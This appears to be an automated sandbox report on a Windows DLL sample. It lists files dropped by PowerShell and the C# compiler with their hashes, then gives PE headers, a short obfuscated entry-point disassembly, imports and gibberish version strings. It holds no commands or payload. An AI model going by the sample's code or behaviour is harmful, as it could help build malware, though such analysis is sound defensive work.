SHA-512: | B5A37C47C86180073DF88121AF5B4A37FD0B024A0C94C7F14AEBF9AD8BE12362FD648109A7723F157A4091BAD2D5A3E7C84007C0B2A44EE3E0627C14B51A643B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.988707873560221 |
Encrypted: | false |
SSDEEP: | 24:H3Fm9Uatw9cRqOaH1fhKdNwI+ycuZhNXakSpPNnq9Sd:0tTRqLV5Kdm1ulXa3Lq9C |
MD5: | F9AE76ADEB946619CCD136219AB83EBC |
SHA1: | FCB9A6777045F64617F751F96957B235A47A757B |
SHA-256: | B79D63E16A61C19E5EE50230B0143BE2C4AD2DF81EC7B4FEEFF432025ACDBDDA |
SHA-512: | 9DF724F487DAEBE62AD4702C4BF25FE175B232E24BE71F4E35206A117DF1665255299108EA83ADE96DAC2D8CD5C7181AADBCB6688BEBDA805626BFD21F0E141B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.9940771285616306 |
Encrypted: | false |
SSDEEP: | 24:H5Fm9na/9bXm/aHvhKdNwI+ycuZhNDBakSgmPNnq9Sd:5/9b/pKdm1ulDBa3gaq9C |
MD5: | 98893A1D42AF866B0F54D4FE368CBD5E |
SHA1: | B77C376C7769D47862458D89755015A3FA49B1E3 |
SHA-256: | 2C720A7C79425332A9E0E88242C1EB733F1C8A677833F78CA412B3953F6A3D29 |
SHA-512: | 3B9247CCD6A1E0FD9F04791FD3EF4E874B0115BF99A9696747A63C70480E81FE03AC2653231CD298C904DDDAEEA9257437060D3211356FE204C5196EAA868995 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1130003120917578 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7YnqqkPN5Dlq5J:+RI+ycuZhNYakSkPNnqX |
MD5: | EDBBDC9948E1C647F92420624B606E4D |
SHA1: | E3DDECF117CC5C8B855538733A2E6DD9AB13F989 |
SHA-256: | F0FDDCBF33459AC7738A011F4D9EAF4CA133B9F7303F78C2BA791E9F101B9E4E |
SHA-512: | 3EE0BE7961D34BFCFBCACE071561855E00C1C2935D10F45CA0C088869E31EC76F7743174F04507A425804E023CCBA82E907FDF8FDDF136C69E0C8677E5ED1F34 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 404 |
Entropy (8bit): | 5.019892496194437 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy |
MD5: | 04CA9F3DD2F71BC69A66232592BD29B7 |
SHA1: | 12724CB97FE30A8B84901648B3653B9AC8FB2F73 |
SHA-256: | DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1 |
SHA-512: | 383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.267076526526121 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f4BcHUzxs7+AEszIN723f4B2x:p37Lvkmb6K2aEWZETaB |
MD5: | C9383FA41DC988BDB143785D8AF21F8E |
SHA1: | 50F307AA50C261190CF8483EA752DA26C0BABC4C |
SHA-256: | 0D83097E96BED92D0D80BCE70B500D61C4A177690BC173B97B2743BA6AE346EE |
SHA-512: | 6AEFD2A95C449DD2AFC0CA0A96E4B99678E4EFDC6B40A5B23F9044962B28D723C321A5075C96A24C967FE9F9B3154C6E08EBAB67C24F0541316665E6C5E4A728 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.623285217450161 |
Encrypted: | false |
SSDEEP: | 24:etGSuW8OmU0t3lm85nt4tdalqQg6ASS41lI+tkZfQB85tVUWI+ycuZhNYakSkPNq:6uQXQ3r5eXa1+xJQyB31ulYa3kq |
MD5: | 3D44991528B31B2492D087F27228A85D |
SHA1: | 4DB4C06B60812F7EE5F4AA6E0CFF86C625E9E5CF |
SHA-256: | 26CF5106FC2D30A9A605EC56AE32BE1BF6224318DE9320F0A9873F21DE341CED |
SHA-512: | 3A804AB0119490C015CACAA29452D07B3A6BA673DEA71B11FB87D25A1F2886A888B84D77975D1284890731A194D1C2E453B299F45166181B15797B23B7FC3E12 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.329634713423145 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2alETakKaM5DqBVKVrdFAMBJTH:Akka6ClE+kKxDcVKdBJj |
MD5: | 4F092FEEE1A852153F061DEA7821027D |
SHA1: | 2DA69C503AC965ED588A818FEBA4A2CCD7F1B4F7 |
SHA-256: | 3A56BC18D26E454422E4DF81A2489EEDFD223F5855DBA7E40FD335D942F3EC73 |
SHA-512: | C39D6307A1EC663FD52186B35C979769612876C1F90BA200DEAA0726650DDF41E0EE6AA9F938323B59EE1D1362ABCF2B8A6941AE5F9780C16502148FC2661BEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1113362183779265 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySlAak7YnqqhllPN5Dlq5J:+RI+ycuZhNXakSpPNnqX |
MD5: | A88F00BBFDBFE259B40183FFC75D9408 |
SHA1: | 414BF62BCA044231DACA7752347698DBAA00E67B |
SHA-256: | C1B75F5C9B64488B0DBE50A2B867C85E3F9E9304CC2E13DDBAE1C39D4011C9AE |
SHA-512: | 794758EB33B865CBE03B977AB5DF6EC5DB5C0EADFC281483D51AD103E1F8D2C89FDE163A9B395574077041D79EFD629427FEB3544AB07C1A7860D136BF7ECCD5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 404 |
Entropy (8bit): | 5.019892496194437 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy |
MD5: | 04CA9F3DD2F71BC69A66232592BD29B7 |
SHA1: | 12724CB97FE30A8B84901648B3653B9AC8FB2F73 |
SHA-256: | DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1 |
SHA-512: | 383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.2488548966565 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723flw5iqzxs7+AEszIN723flw5ihLx:p37Lvkmb6K2atwPWZETatwgLx |
MD5: | 24931FFAE4DF7D6305385238DAD359FC |
SHA1: | FAB90F49021F1D60CB1E0606D926E7B677E48A87 |
SHA-256: | 61C2556798DFD3E26294CE2733EDC01C9406378272490722F1EF1D86C4A6EA99 |
SHA-512: | B3022A35DF07D97BB735F9C2B6BAC183FAEEEFF1914DD53ED35E148BBDAA2C09B148642244E86B91DEBC9A7CA4862CA61AD72A144048651D6A33CE1203E91862 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6253773115307077 |
Encrypted: | false |
SSDEEP: | 24:etGShW8OmU0t3lm85nt4tdalqQg6AYmS41lI+tkZfx1BpDVUWI+ycuZhNXakSpPE:6hQXQ3r5eXa19RxJx1t31ulXa3Lq |
MD5: | 8C5A6F27CC97FC8390400D7974C611CF |
SHA1: | 3C9C53FCEBD7599B86A1E07845C514EF16D0D6D1 |
SHA-256: | 1A9E722F89B142169DDC62341CDB475307FD856EE957177C81FE6D2AAA7106FD |
SHA-512: | 8B18D37847067790CBE2A7598A0A0F12F9AB50C513E3BBCBFB69CB4CC7A27BA0D31E860BA32CB4D5DA7B760D587DF211B909EC21F9546EFBFC97C37E5CF8C2EB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.328469441015724 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2atwMETatwDKaM5DqBVKVrdFAMBJTH:Akka6Ct5E+tAKxDcVKdBJj |
MD5: | 07018FFECE88CF001CB9D4AAC806AD94 |
SHA1: | 262110DE21684CEB1CF38B9AD2F8D0DE8BDD1FCA |
SHA-256: | 35535ED1DD51A2A54393C8E524F90E5D6E9B46AEE5DD8C54E794F619A1367580 |
SHA-512: | DD7AE380CE2468208A753244D70FF68DF4CB363EAE58D786223177AAB66AAB8669166C7498B419D84EAD00887825C790770A7AD975D8EFF31D7BB6F7A5A4692D |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.100104757369302 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryh3DVak7YnqqC3DaPN5Dlq5J:+RI+ycuZhNDBakSgmPNnqX |
MD5: | D954C33EBD78A0402D93912E9C840B10 |
SHA1: | B03DB0FBAA26849B99F4850034E9EBC80C70EA3A |
SHA-256: | 19FA8C1D11BF9A098961D905F621191401AD5993D19DA204584C94CD42943E95 |
SHA-512: | 6728C021468AA6BEA0C79BFB0DFA1D2A7897540E3F3CA255D55CEC5BE94FE236B1A57989E8F67E66D31C8BD704CE783A01D6603F7EC42A5BAAA2A5A31D0515DB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 408 |
Entropy (8bit): | 5.01293234302818 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy |
MD5: | 35EAB9A45B1CC09A0099A179AD3DCFE5 |
SHA1: | 42939AC7047BC372300FDD21624100E5C9F83B7F |
SHA-256: | EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7 |
SHA-512: | 03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.219912626484364 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fkVmn0zxs7+AEszIN723fkVYBH:p37Lvkmb6K2acG0WZETaca |
MD5: | 34A773F7B8389B7C20FDB6FF12917D5C |
SHA1: | D3A2E967E8DD581C15AB7E9F21B53473D176D39E |
SHA-256: | C704F25B7D106E06E3B26916B131E334000A13A10224DBC5F91F7D2819B82B00 |
SHA-512: | 5693BDE5AD8AB502C9A29FF73CBC65D9E00DA43AA7905DACE7E79B201BF049E1E6D6CAB1856ED8438C0404F6DEFA850004BEE45A1F90A6E09FC5CEF27E97EA0A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.62501849036444 |
Encrypted: | false |
SSDEEP: | 48:6ngXE7S5FwYXok+tW8J7dZX1ulDBa3gaq:0r7S5ekHAe3K |
MD5: | B63AB26774F1392792102FA250376086 |
SHA1: | D5AC0F6E7CA124ABDA2D5DF72E07D029D9F83AAD |
SHA-256: | D3948F33A5E41D61F208E5920DDD49E43448BF6423876208F012BA908F116B6A |
SHA-512: | 19E648C604D16438B972741CAEA22524AD8E1A215CED59DC88ACC296897A9DAB614296C2E322F85BE7B3FD77BE2BCC25E01468E8237ACDF1B90C85B8B2E35345 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.312830604004008 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2aRVETa6KaM5DqBVKVrdFAMBJTH:Akka6C3E+6KxDcVKdBJj |
MD5: | C16EB51C1D3455F1E5429F10376280E2 |
SHA1: | A8918021B5639615568E17FAB327A661353D7FAE |
SHA-256: | E0EB56671CE6EE4F722CBA06BB8BF577B0C55180E5D6841E56242A29550FF22A |
SHA-512: | CC6CFE8088BECB6CFD92D790E20546582B9973F7782FA67BE6F7757E0602A491CB7D9A4CD697745729A19AEFABEB34FCA1CBD5320930E41C5CB1371E4CF735C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 838 |
Entropy (8bit): | 3.073236880282747 |
Encrypted: | false |
SSDEEP: | 12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB |
MD5: | CA1C201059C5BFD5900F5EB2466883CC |
SHA1: | BF3670A8C06A4FABC5C410F368E178B353F9166C |
SHA-256: | E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085 |
SHA-512: | 2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220124\PowerShell_transcript.216554.+JTGvHZ_.20220124111050.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1375 |
Entropy (8bit): | 5.365567609663631 |
Encrypted: | false |
SSDEEP: | 24:BxSACh7vBVLdx2DOXUWApN56LCHzcd4XWbHjeTKKjX4CIym1ZJXa7gpN56LCHzch:BZCZvTLdoOo59z44GbqDYB1Zg7o59z4D |
MD5: | 603D401F7EAC08FC8B327D0EF2561455 |
SHA1: | 149854D9F7CB2305CF57F6688256F250121D6FC5 |
SHA-256: | B92DEAD3AECF556A4049EC4A4728B901E7F873F0DC303F546955A7429372829E |
SHA-512: | 8EA181C98205E902B4BEC5B63D58FB035E8ACB4EA761918DAA9218A10EDD488CAF299B6DCE7316E29031EA92CB180F37A9B2FB23E3D315A128C489F2C5AC934F |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220124\PowerShell_transcript.216554.38uu7uYg.20220124111043.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1379 |
Entropy (8bit): | 5.357208023916629 |
Encrypted: | false |
SSDEEP: | 24:BxSACXi7vBVLdx2DOXUWOOtLCHWft4XWsHjeTKKjX4CIym1ZJXaDOtLCHWft4Z16:BZC6vTLdoOPey4GsqDYB1ZgCey4ZpZZG |
MD5: | 713FE5DF4FF7D1A11AB057EDE7222C0A |
SHA1: | 57FB59FB06F2CBA46581854E79BBD18FBE370B60 |
SHA-256: | 61DCDB2A6CB6B53776A9E0A74F8440EAC5ABF42BA88CFC18A97FCF02DC355830 |
SHA-512: | BE8244E7E9D994AD4F6127808AFE1C5941A86F6C43A3501F30DC2F58BE0135A251E11FC557DA4705E883907BAF71D17950E355862E43CC36AE60A424BC0D41B1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 231 |
Entropy (8bit): | 5.4165391723637075 |
Encrypted: | false |
SSDEEP: | 6:QHMK1sS4VIpgKLMV4VsS+LgyKBM34H6xH83F1tu4r9iyej3:QsQsS4ij4a+S+LgyaI4HYcA4cyej3 |
MD5: | 84FABF1BB283E4633523CA8D54A205F7 |
SHA1: | 5F2826AB0B537DD3FFD5980DFE392C6CAD3588FD |
SHA-256: | BE23CC7E43D20E68AAF00213869083E04A1020BAB5B1EA6F9F14FC6CA7F4CCFD |
SHA-512: | 66FC2FE9DEB4EB9DC66F855D729E7953BB59838BB4F14AF7C1B0BB82999B5E5D09AA0D01ECA2551937E033D9BA771822BAF82C77E9E76CDF5655FA55715DC050 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.042994221038388 |
TrID: |
File name: | 61ee6edf7de65.dll |
File size: | 97280 |
MD5: | b6f0fc5638a110abac1a54805f77e786 |
SHA1: | f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe |
SHA256: | 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf |
SHA512: | b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8 |
SSDEEP: | 1536:2V4a+Lezr4lBJMMTQH41pf951L6e9IImUTKpobwjB52DXjaWVghVBDmC6eUd:i8or4TJMKz951feKTKobwjkGWqNmfd |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v.......v...v...v.......v....?..v.......v..Rich.v..........PE..L......a...........!.........\......0........0..... |
Icon Hash: | 30696968ccaacc4c |
Entrypoint: | 0x10001630 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x10000000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT |
Time Stamp: | 0x61EDF5E1 [Mon Jan 24 00:42:09 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 6 |
OS Version Minor: | 0 |
File Version Major: | 6 |
File Version Minor: | 0 |
Subsystem Version Major: | 6 |
Subsystem Version Minor: | 0 |
Import Hash: | 16fee73a0bcca61f5b30bccb8ad3cbcf |
Instruction |
---|
push ebp |
mov ebp, esp |
sub esp, 00000354h |
mov byte ptr [ebp-01h], 0000007Fh |
mov dword ptr [ebp-0Ch], 0000661Fh |
mov dword ptr [ebp-000000B0h], 000028DFh |
mov eax, dword ptr [ebp-0Ch] |
mov dword ptr [ebp-000000ECh], eax |
cmp dword ptr [ebp-000000ECh], 0000661Fh |
je 00007FA384C4F347h |
jmp 00007FA384C506D1h |
mov ecx, 000002EBh |
mov word ptr [ebp-08h], cx |
cmp dword ptr [ebp-0Ch], 00004BFFh |
jnle 00007FA384C4F380h |
movsx edx, word ptr [ebp-08h] |
or edx, 00000301h |
mov word ptr [ebp-08h], dx |
mov eax, dword ptr [ebp-0Ch] |
push eax |
mov ecx, dword ptr [ebp-0Ch] |
push ecx |
mov edx, dword ptr [ebp-0Ch] |
push edx |
mov eax, dword ptr [ebp-0Ch] |
push eax |
call 00007FA384C4F1F8h |
add esp, 10h |
mov ecx, dword ptr [ebp-0Ch] |
shl ecx, 0Dh |
mov dword ptr [ebp-0Ch], ecx |
movsx edx, byte ptr [ebp-01h] |
xor edx, 43h |
mov byte ptr [ebp-01h], dl |
jmp 00007FA384C5065Dh |
lea eax, dword ptr [ebp-08h] |
mov dword ptr [ebp-14h], eax |
movsx ecx, byte ptr [ebp-01h] |
sub ecx, 5Dh |
mov byte ptr [10004000h], cl |
mov dword ptr [ebp-000000ACh], 000037A9h |
mov edx, dword ptr [ebp-0Ch] |
mov dword ptr [ebp-1Ch], edx |
mov eax, dword ptr [ebp-1Ch] |
add eax, 000055AFh |
mov dword ptr [ebp-0Ch], eax |
mov ecx, dword ptr [ebp-1Ch] |
and ecx, 00007739h |
mov dword ptr [ebp-0Ch], ecx |
mov edx, dword ptr [ebp-000000ACh] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3354 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x14350 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b000 | 0x264 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x31ec | 0x1c | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x1ec | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1a6e | 0x1c00 | False | 0.516322544643 | data | 5.7793588503 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x3000 | 0xe12 | 0x1000 | False | 0.402587890625 | data | 4.808493385 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x4000 | 0x1c8 | 0x200 | False | 0.060546875 | data | 0.203681906087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.CRT | 0x5000 | 0x14 | 0x200 | False | 0.052734375 | SysEx File - Oberheim | 0.229276782846 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0x6000 | 0x14350 | 0x14400 | False | 0.655478395062 | data | 5.94341931663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x1b000 | 0x264 | 0x400 | False | 0.556640625 | data | 4.50253277193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x6180 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_RCDATA | 0xa948 | 0xfa07 | data | English | United States |
RT_GROUP_ICON | 0xa3a8 | 0x14 | data | English | United States |
RT_VERSION | 0xa520 | 0x428 | data | English | United States |
RT_MANIFEST | 0xa3c0 | 0x15a | ASCII text, with CRLF line terminators | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | GetSystemInfo, GetCurrentThreadId, GetCurrentProcessId, InitializeCriticalSection, QueryPerformanceFrequency, HeapCreate, GetVersion, GetProcessHeap, CreateTimerQueue, GetLogicalDrives |
USER32.dll | GetDlgItemTextA, CheckDlgButton, CheckRadioButton, IsDlgButtonChecked, SendDlgItemMessageA, DefDlgProcA, OpenClipboard, CloseClipboard, SetClipboardData, GetClipboardData, EnumClipboardFormats, EmptyClipboard, CharUpperA, CharLowerBuffA, SetFocus, GetActiveWindow, SetTimer, KillTimer, EnableWindow, LoadAcceleratorsA, DestroyAcceleratorTable, TranslateAcceleratorA, GetSystemMetrics, SetDlgItemInt, GetSystemMenu, CreatePopupMenu, DestroyMenu, CheckMenuItem, EnableMenuItem, GetSubMenu, AppendMenuA, RemoveMenu, TrackPopupMenu, InsertMenuItemA, SetMenuItemInfoA, SetActiveWindow, InvalidateRect, RedrawWindow, SetWindowTextA, GetWindowTextA, GetClientRect, GetWindowRect, MessageBoxA, SetCursor, GetCursorPos, ClientToScreen, ChildWindowFromPoint, GetSysColor, GetSysColorBrush, GetWindowLongA, SetWindowLongA, FindWindowA, CheckMenuRadioItem, LoadCursorA, DestroyCursor, LoadIconA, DestroyIcon, IsDialogMessageA, GetDlgItem, EndDialog, DialogBoxParamA, CreateDialogParamA, SetWindowPlacement, GetWindowPlacement, SetWindowPos, MoveWindow, DestroyWindow, IsMenu, IsWindow, GetClassInfoA, UnregisterClassA, RegisterClassA, CallWindowProcA, PostQuitMessage, PostMessageA, SendMessageA, DispatchMessageA, TranslateMessage, GetMessageA, wsprintfA, wvsprintfA, SetDlgItemTextA, GetMenu |
GDI32.dll | GetStockObject, DeleteObject, SelectObject, SetBkMode, SetTextColor, GetObjectA, CreateFontIndirectA |
COMDLG32.dll | GetOpenFileNameA, GetOpenFileNameW, GetSaveFileNameA, GetFileTitleW, ChooseColorW |
ADVAPI32.dll | RegSetValueA, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueA, GetUserNameA, RegCloseKey, RegCreateKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA |
VERSION.dll | GetFileVersionInfoW, VerInstallFileW |
Description | Data |
---|---|
LegalCopyright | Copyright Magnificenc gynaecologis automobil directionall codeword |
InternalName | Lecture |
FileVersion | 7.125.80.2 |
CompanyName | Descendan greyin |
LegalTrademarks | Chapter earthin highwayma acri |
Comments | Maladroi fallibilit |
ProductName | Garbag cribbag |
ProductVersion | 7.125.80.2 |
FileDescription | Formul flintlock adjudicate emi invigilator menarch |
OriginalFilename | Anhydrou |
Translation | 0x081a 0x081a |
